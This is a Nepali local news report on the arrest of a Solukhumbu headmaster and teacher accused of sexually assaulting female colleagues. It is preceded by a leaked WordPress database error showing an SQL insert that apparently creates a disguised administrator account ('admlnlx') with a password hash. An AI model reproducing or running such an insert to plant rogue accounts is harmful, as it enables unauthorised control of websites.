WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BBqz4zDECF/3rfX5ZUiJxmiV0fJTth/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-01 10:18:08', '', 'admlnlx', 'admlnlx')
सोलुखुम्बु । सोलुखुम्बुको एक विद्यालयका प्रध्यानाध्यापक र शिक्षक जबरजस्तीकरणीको आरोपमा पक्राउ परेका छन् ।
थुलुङ दुधकोशी – ९ लोखिम कुरिमा स्थित लमूडाँडा आधारभूत विद्यालयका प्रध्यानाध्यापक विनोद कुमार बस्नेत र शिक्षक राजेन्द्र कुमार बस्नेत पक्राउ परेका हुन् । उनीहरुलाई आफ्नै विद्यालयका सहकर्मी शिक्षिकालाई जबरजस्तीकरणीको आरोप लागेको छ ।
प्रध्यानाध्यापक बस्नेतले गत फागुन २६ गते जुबुमा आयोजित फुटबल प्रतियोगीतामा संयम्सेवकका लागि जाँउ भनेर आफ्नो घरमा लगेर २ दिन सम्म राखेर जबरजस्तीकरणी गरेको पिडित महिलाले प्रहरीलाई दिएको किटानी जाहेरीमा उल्लेख गरिएको छ ।
अर्का शिक्षक बस्नेतलाई गत १९ फागुनमा आफ्नै कोठामा पढ्दै गरेकी महिलालाई पछाडीबाट संबेदनशील अंगमा समातेर जबरजस्तीकरणीको प्रयास गरेको आरोप लागेको छ ।
प्रध्यानाध्यापक बस्नेतलाई जबरजस्तीकरणी र शिक्षक बस्नेतलाई जबरजस्तीकरणी उद्योगमा मुद्धा दर्ता गरेर अनुसन्धान गरिरहेको जिल्ला प्रहरी कार्यालयले जनाएको छ ।
पिडित महिला २२ र ३३ बर्षका छन् । जबरजस्तीकरणीमा परेकी २२ बर्षिया महिलाको काठमाण्डौँमा उपचार भईरहेको स्रोतले बताएको छ ।